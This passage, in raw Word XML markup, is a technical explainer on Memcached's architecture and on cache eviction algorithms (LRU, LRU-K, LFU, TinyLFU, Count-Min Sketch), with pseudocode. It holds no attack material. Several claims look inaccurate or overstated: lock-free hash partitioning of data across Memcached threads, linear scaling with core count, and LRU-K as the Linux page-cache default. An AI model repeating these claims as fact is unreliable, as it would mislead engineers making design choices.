    <w:p w14:paraId="33FEE15B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-threaded architecture:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Memcached uses one thread per CPU core, each running its own event loop. Data is partitioned across threads using the key's hash, eliminating lock contention between threads. This architecture scales linearly with CPU cores — Memcached on a 32-core server handles ~32× the throughput of a single-core deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54183C98" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Slab allocator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D97992" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Memcached uses a custom </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>slab allocator</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> rather than general-purpose malloc. Memory is divided into slabs, each serving allocations of a specific size class. Objects are allocated within the appropriate slab class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7219B485" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2F5464" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Slab class 1: items up to 96 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C566C2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Slab class 2: items up to 120 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7103DF90" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Slab class 3: items up to 152 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA49544" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FF3895" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Slab class N: items up to 1MB (maximum item size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2A6EAB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Benefits: no fragmentation within a slab class (fixed-size items fill fixed-size slots perfectly), no need to free memory to the OS (slots are reused), low allocation overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E454FD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Drawback: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>slab class imbalance</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">. If most items are 100 bytes (slab class 2) and few are 200 bytes (slab class 4), slab class 2 is full and evicting items while slab class 4 has empty space. Memory is stranded in underutilized slab classes. The automove feature in modern </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>Memcached migrates slabs between classes based on utilization, but this is not instantaneous.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9D3099" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When Memcached over Redis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5E2A62" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1357"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sheer throughput:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Memcached's multi-threaded architecture outperforms Redis on multi-core systems for simple get/set workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168CD269" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1357"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory efficiency for simple key-value pairs:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> No data structure overhead, slab allocator minimizes per-item overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3370D3B2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1357"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Simplicity:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> If you only need get/set/delete with TTLs, Memcached's simpler operational model may be preferable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A762D6F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Redis wins for: persistence, data structures beyond key-value, atomic operations, Pub/Sub, Lua scripting, cluster topology, and the vast majority of production deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B99FA9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="7F489496">
          <v:rect id="_x0000_i4790" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="562F1A44" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Cache Eviction Policies — The Full Algorithm Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680F96EA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LRU — The Standard and Its Problems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391D84A5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>True LRU implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C768E86" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>A doubly-linked list + hash map. The list maintains recency order — most recently used at the head, least recently used at the tail. The hash map provides O(1) key → list node lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4689B1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1D0B10" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>On access(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113E54C2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  node = hashmap[key]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F465831" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  move node to list head    ← O(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B20EBD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  return node.value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EC58AE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="3312D3E4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>On insert(key, value):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7457B302" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  if cache full:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637B441E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    evict list.tail         ← O(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF11E6D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  node = new Node(key, value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F28E1CF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  hashmap[key] = node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6BB477" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  list.prepend(node)        ← O(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F71325" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>True LRU weakness — scan resistance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A64B15" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>A sequential scan of N unique items evicts the entire cache's contents. After the scan, the cache contains only the scan items — which will never be accessed again. The truly hot items are gone. This is the </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cache pollution</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679B39E5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LRU-K (Linux page cache default):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4908FB27" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Instead of tracking when an item was last accessed (LRU = K=1), track when it was accessed for the </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>K-th time</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> (LRU-K, typically K=2). An item must be accessed at least K times before it's considered "hot enough" to displace existing hot items. Single-access items (scans) cycle through a probationary buffer and are evicted without polluting the main cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7897F5C2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Linux kernel's page cache uses a two-list variant:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> An inactive list (recently added or accessed for the first time) and an active list (accessed at least twice). Pages promoted from inactive to active on second access. Eviction targets the inactive list tail — single-access pages are evicted without affecting the active list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BC1792" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LFU — Frequency-Based Eviction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E1453B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>True LFU implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7729D8C0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Maintains a frequency counter per item. On eviction, removes the item with the lowest frequency. Naively, this requires O(N) scan for minimum frequency on each eviction — unacceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6D224E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>O(1) LFU with frequency doubly-linked list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C9DB2F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Maintain a doubly-linked list of frequency buckets. Each bucket contains all items with that access frequency. Items within a bucket are ordered by recency (an LRU within each frequency group). A hash map provides O(1) item → (frequency, position) lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEA738B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535F4A53" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B34027" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  freq_buckets: {1: [item_d, item_e], 2: [item_a, item_c], 5: [item_b]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB0BE28" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  min_freq: 1  (pointer to the minimum frequency bucket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637BE1E4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2295CE1B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>On access(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6810B953" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  (freq, node) = hashmap[key]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A284FC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  remove node from freq_buckets[freq]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D49D99" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  freq_buckets[freq+1].prepend(node)  ← recent item within higher freq bucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAEDF8E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  update hashmap[key] = (freq+1, node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC336C8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  if freq_buckets[freq] is empty and freq == min_freq:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B197B95" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    min_freq++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA6F6AB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F51DB8E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>On evict():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6260C3D4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  evict tail of freq_buckets[min_freq]  ← O(1) — always the minimum frequency bucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354595C6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LFU weakness — cache pollution from historical frequency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498FAD23" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>An item that was extremely popular 6 months ago has high frequency. It will never be evicted even if it's never accessed again. The frequency counter retains history indefinitely. </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aging</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> mitigates this: periodically halve all frequency counters (or use exponentially decaying counters). Redis's LFU implementation uses logarithmic counters with time-based decay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F1FA3F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TinyLFU and W-TinyLFU — The State of the Art</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091A1742" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The admission filter insight:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FB06AF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>LFU requires storing a frequency counter per cache item. For large caches with small items (millions of entries), frequency counters add significant memory overhead. </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TinyLFU</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>frequency sketch</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> — a Count-Min Sketch (probabilistic data structure) — to estimate frequency with minimal memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613C3AE5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Count-Min Sketch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAC3C6E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10972E9E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>4 hash functions h1, h2, h3, h4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E41108" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>4 counter arrays, each of size W</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526E2B22" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="67799F46" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>To increment frequency of item x:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE03E29" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  counters[0][h1(x) % W]++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BD7CCB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  counters[1][h2(x) % W]++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38693FAE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  counters[2][h3(x) % W]++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BCB813" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  counters[3][h4(x) % W]++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEE7DC8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="6A5C2311" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>To estimate frequency of item x:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBA32F7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  min(counters[0][h1(x) % W],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61422E3B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">      counters[1][h2(x) % W],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F47B0E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">      counters[2][h3(x) % W],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382197F6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">      counters[3][h4(x) % W])</w:t>
      </w:r>
    </w:p>
